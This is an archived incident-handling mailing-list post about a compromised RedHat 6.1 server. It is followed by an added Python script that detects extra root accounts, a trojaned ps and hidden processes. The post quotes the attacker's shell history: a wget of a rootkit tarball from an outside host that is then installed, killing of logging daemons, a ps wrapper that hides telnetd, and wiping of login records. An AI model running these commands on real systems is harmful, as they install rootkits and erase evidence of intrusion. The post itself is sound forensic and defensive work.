I was dealing with a compromised server (RedHat 6.1) yesterday and it was utter crap. After logging into the server the first thing I did was cat /etc/passwd. At the bottom of /etc/passwd was the user "liq2" with a uid of 0. Not so clean. The user "liq" had a uid of 501 I believe. Both users had home directories in /home... so there was a /home/liq and /home/liq2. /home/liq contained a program, along with source, that scanned /24's for Cisco devices. /home/liq2 had an untampered .bash_history with this in it:

    wget http://home.dal.net/[-liquid-]/login.tgz; tar zfx login.tgz; cd login; pico rk.h; ./configure; make; make install; cd ..; rm -rf login;
    cd /home/liq; rm -rf login.tar.gz;
    wget ftp://ftp.wuftpd.org/pub/wu-ftpd/wu-ftpd-2.6.2.tar.gz; tar zxfv wu-ftpd-2.6.2.tar.gz; cd wu-ftpd-2.6.2;./configure;make;make install; cd ..; rm -rf wu-ftpd-2.6.2; rm -rf wu-ftpd-2.6.2.tar.gz;
    killall crond;killall syslogd;killall klogd;
    mv -f /bin/ps /bin/xps; echo "xps \$*|grep -vi 'in.telnetd'|grep -vi 'grep'|sed s/'xps'/'ps'/g">/bin/ps; chown root.bin /bin/ps; chmod 0755 /bin/ps;
    rm -f /var/run/utmp /var/run/wtmp; touch /var/run/utmp /var/run/wtmp; chmod 0 /var/run/utmp; chmod 0 /var/run/wtmp

Very very sloppy... But you can also see this in there...

    mv -f /bin/ps /bin/xps; echo "xps \$*|grep -vi 'in.telnetd'|grep -vi 'grep'|sed s/'xps'/'ps'/g">/bin/ps

The attacker moved /bin/ps to /bin/xps and then echoed a script to ps which removes in.telnetd from showing up and changes the name of xps to ps. Yes very crappy. You have to be 2 years old to not catch that, especially when sed shows up in the process list every time you type "ps".

Moving right along, I soon noticed I was on pty/2 but who showed me as the only user... interesting... Ok, I typed xps and noticed that "./wu" was running on pty/1! Odd... And then I noticed the system load average jump from .2 to 2.0!

Now I noticed that "./wu" wasn't running but "./pscan" was now running. At this point in time I decided enough was enough and had the machine unplugged. Later on I went to look at it again from the console and noticed that these IPs had connected with telnet:

    212.199.3.193
    212.199.12.34
    212.199.173.26

They also weren't smart enough to remove or alter anything in /var/log/ and "last" showed them logging in with ftp and telnet! DOH! Further investigating found "wu" and "pscan" in /tmp/.or/

So has anyone else seen a compromise such as this? From what little investigating I did this is all I found modified... Looks like script kiddies were at work ;).

-switched

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
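The three things switched spotted by hand (a second UID 0 account in /etc/passwd, /bin/ps replaced by a wrapper script that filters its own output, and processes that exist but never show up in ps) can be checked mechanically. The script below is an added example written for this archive page; it is not switched's code and not part of the original post. The function names are my own, and the sample passwd lines, the fake ps wrapper and the ps listing are constructed from what the post describes, so the checks run offline. The live checks at the bottom only run on a Linux box with /proc and are skipped elsewhere.

```python
"""Detection helpers for the trojaned-ps / extra-root-account pattern in the post.

Added example, not the poster's code. Sample data below is constructed from
the post (names like "liq2" and the grep/sed wrapper) and is not real evidence.
"""
import os
import re
import subprocess

ELF_MAGIC = b"\x7fELF"


def extra_uid0_accounts(passwd_text):
    """Return every account other than 'root' whose UID field is 0.

    Any hit is a second superuser login, like the "liq2" entry in the post.
    """
    extras = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 3 or line.startswith("#"):
            continue
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            extras.append(name)
    return extras


def classify_binary_head(head_bytes):
    """Classify the first bytes of a file that should be a compiled tool.

    Returns "elf" for a real executable, "script" for readable text (a shebang
    line or, as in the post, a bare xps|grep|sed pipeline), "unknown" otherwise.
    """
    if head_bytes.startswith(ELF_MAGIC):
        return "elf"
    try:
        head_bytes.decode("ascii")
    except UnicodeDecodeError:
        return "unknown"
    return "script"


def hidden_pids(proc_pids, ps_output):
    """PIDs that exist (from /proc) but are missing from a ps listing.

    The wrapper in the post greps out 'in.telnetd'; comparing against /proc
    catches that no matter which pattern is filtered. The first integer on
    each ps line is taken as the PID, which works for both 'ps' and 'ps aux'.
    """
    shown = set()
    for line in ps_output.splitlines():
        match = re.search(r"\b(\d+)\b", line)
        if match:
            shown.add(int(match.group(1)))
    return sorted(set(proc_pids) - shown)


# --- constructed sample data, modelled on the post ------------------------
PASSWD_SAMPLE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "bin:x:1:1:bin:/bin:/sbin/nologin\n"
    "liq:x:501:501::/home/liq:/bin/bash\n"
    "liq2:x:0:0::/home/liq2:/bin/bash\n"
)
TROJAN_PS_HEAD = b"xps $*|grep -vi 'in.telnetd'|grep -vi 'grep'|sed s/'xps'/'ps'/g\n"
REAL_PS_HEAD = b"\x7fELF\x01\x01\x01\x00\x00\x00\x00\x00"
PS_SAMPLE = (
    "  PID TTY          TIME CMD\n"
    "    1 ?        00:00:04 init\n"
    "  812 pts/2    00:00:00 bash\n"
    "  901 pts/2    00:00:00 ps\n"
)
PROC_PIDS_SAMPLE = [1, 812, 877, 901]  # 877 would be the filtered daemon


def run_live_checks():
    """Run the same three checks against the local system (Linux only)."""
    with open("/etc/passwd") as fh:
        print("extra uid 0 accounts:", extra_uid0_accounts(fh.read()))
    with open("/bin/ps", "rb") as fh:
        print("/bin/ps looks like:", classify_binary_head(fh.read(16)))
    if os.path.isdir("/proc"):
        pids = [int(d) for d in os.listdir("/proc") if d.isdigit()]
        listing = subprocess.run(["ps", "-e"], capture_output=True, text=True).stdout
        print("pids hidden from ps:", hidden_pids(pids, listing))


if __name__ == "__main__":
    print("sample extra uid 0:", extra_uid0_accounts(PASSWD_SAMPLE))
    print("sample /bin/ps:", classify_binary_head(TROJAN_PS_HEAD))
    print("sample hidden pids:", hidden_pids(PROC_PIDS_SAMPLE, PS_SAMPLE))
    if os.path.isdir("/proc"):
        run_live_checks()
```

Run it on the suspect host from a known-good shell (or better, from a rescue disc with the disk mounted, since the box's own ps and libraries are the things under suspicion). A non-empty list from any of the three functions is enough to justify pulling the plug, as switched did.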
This archive was generated by hypermail 2b30 : Wed Mar 13 2002 - 09:31:27 PST